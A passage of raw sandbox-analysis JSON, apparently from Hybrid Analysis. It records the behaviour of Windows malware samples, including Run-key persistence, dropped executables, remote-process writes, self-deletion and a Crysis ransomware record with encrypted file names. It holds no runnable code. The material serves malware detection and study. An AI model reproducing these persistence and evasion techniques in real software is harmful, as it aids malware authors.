type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00005008)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" queries volume information of \"C:\\\" at 00000000-00002936-0000010C-530729\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005008-0000010C-237785\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003084-0000010C-395507", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005008)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" queries volume information of \"C:\\\" at 00000000-00002936-0000010C-530729\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005008-0000010C-237785\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003084-0000010C-395507", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500f81f6500f31f6500000000000000000000006200000000019cdd22000000000000eb220095e1d577e4a32500feffffff435cd9775059d977aa000000b8000000f21f6500f01f650024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5cd87760d8c775ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edd9771a206500a06aaf758600000024df22005ce322000000000086008800a06aaf7524df2200916caf751a206500a06aaf75a06aaf7594e3220002020000 (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002936)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100a8943100a3943100000000000000000000002e00000000019cdc22000000000000ea220095e1d577afa02500feffffff435cd9775059d977aa000000b8000000a2943100a094310024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5cd87760d8c775ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edd977ca943100a06aaf758600000024de22005ce222000000000086008800a06aaf7524de2200916caf75ca943100a06aaf75a06aaf7594e2220002020000 (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00da77d600da773347de7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003084)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005008)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002936)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has a section named \".eh_fram\"\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002936]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" wrote 16283 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" allocated memory in \"C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0
https://hybrid-analysis.com/sample/c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0
Hybrid Analysis - Ransomware
{"size": 94720, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0", "sha256": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0", "av_detect": 91, "vx_family": "Trojan.Ransom.Crysis", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 4, "total_signatures": 162, "extracted_files": [{"name": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe", "file_size": 94720, "sha256": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe (PID: 6140)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Ransom.Crysis", "av_matched": 18, "av_total": 22, "file_available_to_download": true}, {"name": "HncXsecCore8.dll.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 493316, "sha256": "7e5561d65804158362d4cda64659f99cbc417b059919ed8327eb7011552792c0", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "A3DUtils.dll.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 167148, "sha256": "34b2f6be07deb611192ed21985d032b5ed4a725835fe6e8a78f3000995ae974c", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Statement.xlsx.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 15408, "sha256": "c60e4df31d035748af199a4389fdaca600a051b5579b31e804789ed51960cc76", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "autoit.php.id-085CDA53._vijurytos@tuta.io_.V", "file_size": 124072, "sha256": "2edca97f9621d6e0d0b92f3fef9639a04f369448cb3f7d859e32adfb9ee79ddc", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": 